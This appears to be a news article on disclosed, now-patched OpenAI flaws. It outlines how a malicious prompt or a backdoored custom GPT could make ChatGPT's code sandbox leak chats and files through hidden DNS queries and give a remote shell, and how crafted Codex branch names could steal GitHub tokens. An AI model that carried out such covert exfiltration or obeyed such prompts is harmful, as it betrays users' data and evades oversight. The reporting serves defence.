OpenAI Fixes Major ChatGPT Data Leak and Codex Security Flaws

A newly discovered vulnerability in ChatGPT exposed how sensitive user data could be silently leaked, prompting OpenAI to roll out urgent fixes across its AI systems.

Quick Summary – TLDR:

  • ChatGPT flaw allowed hidden data exfiltration using DNS based covert channels.
  • Attackers could steal chats, files, and run remote commands without user awareness.
  • Separate Codex bug exposed GitHub tokens, risking access to private repositories.
  • OpenAI patched both issues in February 2026, with no confirmed real world exploitation.

What Happened?

Security researchers uncovered critical vulnerabilities in OpenAI systems that could have allowed attackers to extract sensitive data and compromise developer environments. The flaws impacted both ChatGPT and OpenAI Codex, highlighting growing risks in AI-driven platforms. OpenAI has since fixed both issues following responsible disclosure.

A Hidden Channel That Bypassed AI Safeguards

The most concerning issue affected ChatGPT’s code execution environment, where researchers found a way to bypass built in protections using a covert DNS based communication channel.

Normally, ChatGPT blocks direct outbound internet access and requires user approval for data sharing. However, researchers discovered that the system still allowed DNS requests, which attackers exploited as a hidden pathway.

By crafting a malicious prompt, attackers could trick the AI into encoding sensitive information such as:

  • User conversations
  • Uploaded files
  • Confidential inputs

This data was then broken into small fragments and sent out through DNS queries to attacker controlled servers, all without triggering any warnings.

What makes this especially dangerous is how invisible the attack was. The system treated DNS traffic as normal infrastructure activity, meaning:

  • No alerts were shown to users.
  • No consent was required.
  • The data transfer remained completely hidden.

Researchers explained, “A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.”

From Data Theft to Remote Control

The vulnerability went beyond just data leakage. Because the DNS channel worked both ways, attackers could also send commands back into the system.

This effectively allowed:

  • Remote shell access inside ChatGPT’s Linux runtime.
  • Execution of arbitrary commands.
  • Full control outside standard AI guardrails.

Attackers could distribute these exploits in two main ways:

  • Disguising malicious prompts as productivity hacks or jailbreak tricks.
  • Embedding harmful logic directly into custom GPTs.

This meant even cautious users could be exposed without realizing it.

Subscribe To Our Newsletter!

Be the first to get exclusive offers and the latest news.

Codex Flaw Put Developer Data at Risk

Alongside the ChatGPT issue, a separate vulnerability was found in OpenAI Codex, the company’s AI powered coding agent used widely in developer workflows.

The flaw involved a command injection vulnerability in how Codex handled GitHub branch names.

Attackers could:

  • Inject malicious commands through crafted branch names.
  • Execute those commands inside Codex containers.
  • Steal GitHub access tokens used for authentication.

These tokens could then grant:

  • Read and write access to private repositories.
  • Lateral movement across codebases.
  • Potential compromise of entire development environments.

Given Codex’s deep integration with GitHub and enterprise workflows, the impact could have been severe if exploited.

Why This Matters for AI Security?

These vulnerabilities highlight a bigger issue. AI tools are no longer just assistants, they are becoming full computing environments handling sensitive data.

As adoption grows across enterprises, the risks expand as well:

  • AI systems now interact with files, APIs, and internal tools.
  • Hidden attack surfaces like side channels can bypass traditional defenses.
  • Prompt-based attacks and injection techniques are becoming more sophisticated.

Security experts warn that relying only on built in protections is not enough. Organizations need:

  • Independent monitoring layers
  • Stronger input validation
  • Zero trust approaches for AI systems

OpenAI’s Response and Fixes

OpenAI addressed the Codex vulnerability on February 5, 2026, and patched the ChatGPT data leak issue on February 20, 2026.

Importantly:

  • There is no evidence of active exploitation.
  • Fixes were deployed after responsible disclosure.
  • The company continues to strengthen its AI security framework.

Still, the incident adds to a growing list of concerns around:

  • Prompt injection attacks.
  • Data leakage risks.
  • Unauthorized access through AI tools.

SQ Magazine Takeaway

I think this is a wake up call for everyone using AI tools daily. We often assume these systems are safe because they feel controlled, but this story proves that hidden layers can behave very differently.

What really stands out to me is how simple the attack could be. Just one malicious prompt or a backdoored GPT could quietly expose sensitive data. That is not a complex hack, that is something any user could unknowingly trigger.

As AI becomes part of everyday work, especially in companies, security cannot be an afterthought. It has to be built around the system, not just inside it.

Click Here For The Original Source

——————————————————–

..........

.

.

National Cyber Security

FREE
VIEW